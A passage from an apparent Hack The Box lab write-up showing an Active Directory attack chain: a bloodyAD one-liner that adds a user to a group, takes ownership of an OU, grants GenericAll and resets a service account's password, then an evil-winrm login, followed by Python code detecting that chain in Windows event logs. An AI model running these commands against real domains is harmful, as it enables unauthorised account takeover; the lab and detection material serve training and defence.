WinRM


Authenticating to the target WinRM server with the updated credential of the winrm_svc account

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ evil-winrm -i $IP -u winrm_svc -p Qwer1234
 
Evil-WinRM shell v3.5
 
warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
 
data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
 
info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> whoami
rebound\winrm_svc
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> hostname
dc01
*Evil-WinRM* PS C:\Users\winrm_svc\Documents> ipconfig
 
Windows IP Configuration
 
 
Ethernet adapter Ethernet0 2:
 
   Connection-specific DNS Suffix  . :
   IPv4 Address. . . . . . . . . . . : 10.10.11.231
   Subnet Mask . . . . . . . . . . . : 255.255.254.0
   Default Gateway . . . . . . . . . : 10.10.10.2

Initial foothold established on the target system as the winrm_svc user via WinRM.

┌──(kali㉿kali)-[~/archive/htb/labs/rebound]
└─$ bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add groupMember 'CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb' 'CN=oorend,CN=Users,DC=rebound,DC=htb' ; bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set owner 'OU=Service Users,DC=rebound,DC=htb' oorend ; bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb add genericAll 'OU=Service Users,DC=rebound,DC=htb' oorend ; bloodyAD -d rebound.htb -u oorend -p '1GR8t@$$4u' --host dc01.rebound.htb set password 'CN=winrm_svc,OU=Service Users,DC=rebound,DC=htb' Qwer1234
[+] CN=oorend,CN=Users,DC=rebound,DC=htb added to CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb
[!] S-1-5-21-4078382237-1492182817-2568127209-7682 is already the owner, no modification will be made
[+] oorend has now GenericAll on OU=Service Users,DC=rebound,DC=htb
[+] Password changed successfully!

One-liner
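As an added example that is not part of the original writeup, the following Python correlation shows how a defender could flag the chain the one-liner above produces in Windows Security event logs: a group membership change, then a security-descriptor change on an OU, then a password reset, all by the same account within a short window. The event records, field names and timestamps are constructed assumptions, and the check presumes Directory Service Changes auditing is enabled so that event 5136 is actually logged.

```python
"""Flag the group-add -> OU ACL change -> password-reset chain in
Windows Security events.  Event IDs are the standard ones:
4728/4732/4756 (member added to a global/local/universal security group),
5136 (directory service object modified) and 4724 (password reset attempt).
The events below are constructed samples, not logs from the lab host."""
from datetime import datetime, timedelta

GROUP_ADD_IDS = {4728, 4732, 4756}

SAMPLE_EVENTS = [  # constructed; field names are an assumption
    {"ts": "2024-01-01T10:00:00", "id": 4728, "subject": "oorend",
     "target": "CN=ServiceMgmt,CN=Users,DC=rebound,DC=htb"},
    {"ts": "2024-01-01T10:00:05", "id": 5136, "subject": "oorend",
     "target": "OU=Service Users,DC=rebound,DC=htb",
     "attr": "nTSecurityDescriptor"},
    {"ts": "2024-01-01T10:00:09", "id": 4724, "subject": "oorend",
     "target": "winrm_svc"},
    {"ts": "2024-01-01T12:00:00", "id": 4724, "subject": "Administrator",
     "target": "jdoe"},  # routine reset with no preceding ACL change
]


def _ts(event):
    return datetime.fromisoformat(event["ts"])


def detect_acl_then_reset(events, window_minutes=30):
    """Return (actor, ou_dn, reset_account) for every password reset that
    was preceded, by the same actor and within the window, by a group
    membership change and then a security-descriptor change on an OU.
    A password reset on its own is not reported."""
    window = timedelta(minutes=window_minutes)
    by_actor = {}
    for ev in sorted(events, key=_ts):
        by_actor.setdefault(ev["subject"], []).append(ev)
    hits = []
    for actor, evs in by_actor.items():
        for i, reset in enumerate(evs):
            if reset["id"] != 4724:
                continue
            recent = [e for e in evs[:i] if _ts(reset) - _ts(e) <= window]
            acl = [e for e in recent
                   if e["id"] == 5136 and e.get("attr") == "nTSecurityDescriptor"
                   and e["target"].startswith("OU=")]
            grp = [e for e in recent if e["id"] in GROUP_ADD_IDS]
            # order matters: the group add must precede the ACL change
            if acl and grp and _ts(grp[0]) <= _ts(acl[-1]):
                hits.append((actor, acl[-1]["target"], reset["target"]))
    return hits
```

Run against real exports, the same three-step correlation also surfaces ownership changes made through `set owner`, since those rewrite the OU's nTSecurityDescriptor as well.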